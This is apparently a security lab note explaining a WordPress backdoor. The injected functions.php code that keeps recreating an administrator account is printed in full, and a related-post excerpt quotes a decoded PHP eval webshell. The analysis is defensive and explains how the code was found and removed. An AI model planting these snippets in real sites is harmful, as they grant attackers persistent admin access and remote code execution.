Evil Self-Regenerating WordPress Administrator User

Labs Note

Attackers often aim to conceal their presence using different methods, such as injecting redirect scripts, creating spam pages, or hiding a mailer in checkout pages to steal credit cards; but this is not always the case.

We’ve seen some websites where hackers were doing the very opposite. Recently, we noticed a malicious administrative user who had managed making a permanent account to the system. When the actual website administrator attempted to remove the bad guy, WordPress reported that the user was successfully deleted. However, after reopening the Users tab, the unwanted admin user appeared again as if nothing happened.

Such behavior gives the impression that the user is a permanent part of the system since they remained in the Users tab!

After the investigation, we found that the following code was injected in the website theme functions.php file:

function admin_account(){$user = 'admin2';$pass = 'Abc12345!'; $email = 'email2@domain.com';if ( !username_exists( $user ) && !email_exists( $email ) ) {$user_id = wp_create_user( $user, $pass, $email );$user = new WP_User( $user_id );$user->set_role( 'administrator' );} }add_action('init','admin_account');

What does this snippet mean? The code is pretty simple. We can see that it defines the function named admin_account. It specifies only three parameters required for user creation – user, password, and email.

Then the if conditional statement checks if the user is already present on the system. – and if not – it creates a new one. So, the regenerating function is ready. What next?

The function needs to be triggered quite often to grant the bad user ability to regenerate immediately. For that purpose, attackers have added the last part of the code, binding the admin_account function to the init action which is triggered when most of the WordPress is loaded.

Removing the mentioned code from functions.php file ceased the “immortality” of the bad user and evil was banished.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website, even if the obvious backdoor is removed. Knowing your site’s structure and performing an active monitoring of it (being alerted whenever a file is changed or added to your site) will help you to identify the alien admin users and unwanted code injections.

If you see your site having unwanted administrator users but you can’t locate the code that is creating them, you might want to have us scan your site for malware and clean it.

You May Also Like

PHP://input Backdoor

Just came across this backdoor (decoded): @error_reporting(0); @ini_set(“display_errors”,0); @ini_set(“log_errors”,0); @ini_set(“error_log”,0); if (isset($_GET[‘r’])) { print $_GET[‘r’]; } elseif (isset($_POST[‘e’])) { eval ( base64_decode(str_rot13 (strrev(base64_decode (str_rot13($_POST[‘e’])))))); } elseif (isset($_SERVER[‘HTTP_CONTENT_ENCODING’]) && $_SERVER[‘HTTP_CONTENT_ENCODING’]…
Read More